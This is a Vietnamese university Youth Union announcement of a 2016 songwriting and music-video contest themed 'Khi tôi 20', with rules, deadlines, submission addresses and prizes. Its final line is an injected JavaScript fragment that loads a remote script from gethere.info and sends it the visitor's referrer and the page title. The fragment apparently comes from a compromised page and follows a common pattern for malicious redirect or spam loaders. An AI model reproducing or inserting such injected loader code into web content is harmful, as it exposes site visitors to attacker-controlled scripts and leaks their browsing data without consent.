Cuộc thi viết và sáng tác ca khúc, MV Nhạc

1937

Hướng tới Chào mừng niệm 85 năm thành lập Đoàn TNCS Hồ Chí Minh (26/03/1931 – 26/03/2016) và chào mừng 20 năm Đoàn trường Đại học Khoa học Tự nhiên  ĐHQG-HCM xây dựng và phát triển.

Đoàn trường Đại học Khoa học tự nhiên tổ chức cuộc thi viết và sáng tác Ca khúc và MV Nhạc.

CHỦ ĐỀ: KHI TÔI 20

1. NỘI DUNG:

Tác phẩm dự thi bám sát chủ đề: Khi tôi 20.
– Tác phẩm dự thi ca ngợi truyền thống học tập, hoạt động và những giá trị sống tốt đẹp của Đoàn viên thanh niên, Sinh viên trường ĐH.KHTN; thể hiện được sức trẻ và mong muốn không ngừng đóng góp cho xã hội của Đoàn viên, Sinh viên Trường.
– Truyền thống và những thành tích nổi bật của Đoàn trường, Sinh viên trường trong suốt thời gian qua, định hướng sự phát triển trong tương lai của tập thể Đoàn trường.
– Khích lệ, cổ vũ sinh viên ĐH.KHTN vươn lên trong học tập, rèn luyện, có lối sống đẹp, trung thực, trách nhiệm, nghĩa tình; xung kích, tình nguyện vì cuộc sống cộng đồng; phấn đấu trở thành công dân tốt.
– Khơi dậy khát vọng của Đoàn viên thanh niên, sinh viên ĐH.KHTN trong học tập, nghiên cứu khoa học, chiếm lĩnh đỉnh cao tri thức, khẳng định trí tuệ Việt Nam trong khu vực và thế giới.

2. ĐỐI TƯỢNG DỰ THI: Công dân Việt Nam ở mọi độ tuổi hiện đang sinh sống trong và ngoài lãnh thổ Việt Nam

3. THỜI GIAN DỰ THI:
– Thời gian nhận tác phẩm dự thi: từ ngày 20/02/2016 đến hết ngày 15/03/2016.
– Thời gian công bố kết quả: ngày 20/03/2016.
– Thời gian trao giải: dự kiến ngày 26/03/2016.

4. NỘI DUNG – HÌNH THỨC DỰ THI:
a. Đối với sáng tác ca khúc:
– Ca khúc dự thi là ca khúc mới sáng tác của tác giả, chưa từng tham dự bất kỳ một cuộc thi sáng tác ca khúc nào.
– Ca khúc được trình bày rõ ràng, có ít nhất 01 lời bằng tiếng Việt.
– Tác giả dự thi phải gửi kèm ca khúc đã được thu âm (định dạng mp3).
– Mỗi tác giả dự thi không quá 3 tác phẩm.
– Ca khúc dự thi có thể nộp trực tiếp tại Văn phòng Đoàn trường ĐH. Khoa học Tự nhiên:
+ Cơ sở 1: 227 Nguyễn Văn Cừ, quận 5. Phòng  F.106
+ Cơ sở 2: Thủ Đức – Dĩ An. Tầng 2 Nhà điều hành hoặc có thể gửi qua Email: doantn@hcmus.edu.vn.

b. Đối với sáng tác MV ca nhạc:
– Sản phẩm dự thi là video clip ca nhạc (MV) thời lượng không quá 7 phút, do chính tác giả sáng tác, dàn dựng và chưa từng tham dự bất kỳ cuộc thi hay trình chiếu trên các phương tiện truyền thông nào.
– MV có chất lượng âm thanh và hình ảnh tốt (độ phân giải từ 1280×720 pixel trở lên).
– MV sử dụng các ca khúc thể hiện được sức trẻ của Đoàn viên thanh niên, sinh viên.
– Khuyến khích tác giả dự thi các sáng tác mới.
– Tác phẩm dự thi có thể nộp trực tiếp tại Văn phòng Đoàn trường ĐH. Khoa học Tự nhiên:
+ Cơ sở 1: 227 Nguyễn Văn Cừ, quận 5. Phòng  F.106

V. GIẢI THƯỞNG:

a. Giải Sáng tác ca khúc:
1 Giải A:                        2.000. 000 đồng + Giấy khen Đoàn trường

b. Giải Sáng tác MV ca nhạc:
1 giải MV xuất sắc nhất: 2.000.000 đồng + Giấy khen Đoàn trường

– Ngoài ra mỗi tác giả có tác phẩm dự thi đều nhận được một phần quà lưu niệm từ BTC cuộc thi.
– Tác phẩm đạt giải sẽ được trình diễn trong Đêm hội Văn hóa 2016 của Đoàn trường vào ngày 26/03/2016.

c. Một số quy định khác:
– Tác phẩm đạt giải sẽ được BTC toàn quyền sử dụng.
– BTC, ban giám khảo sẽ thẩm định nội dung tác phẩm dự thi của các thí sinh sau khi nhận được tác phẩm dự thi.
– Tất cả thông tin đăng ký phải đảm bảo tính xác thực và người đăng ký thông tin phải chịu hoàn toàn trách nhiệm trong trường hợp có khiếu nại về thông tin đăng ký.
– Trong trường hợp phát sinh tranh chấp, khiếu nại hoặc phát hiện các dấu hiệu gian lận liên quan đến cuộc thi, BTC sẽ trực tiếp giải quyết và quyết định của BTC là kết quả sau cùng.
– BTC sẽ không chịu trách nhiệm về bất kỳ tổn thất nào do lỗi từ người tham dự và những thất thoát, chi phí phát sinh cho việc nhận giải thưởng.

Thông báo: Cuoc thi viet va sang tac ca khuc va MV nhac

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;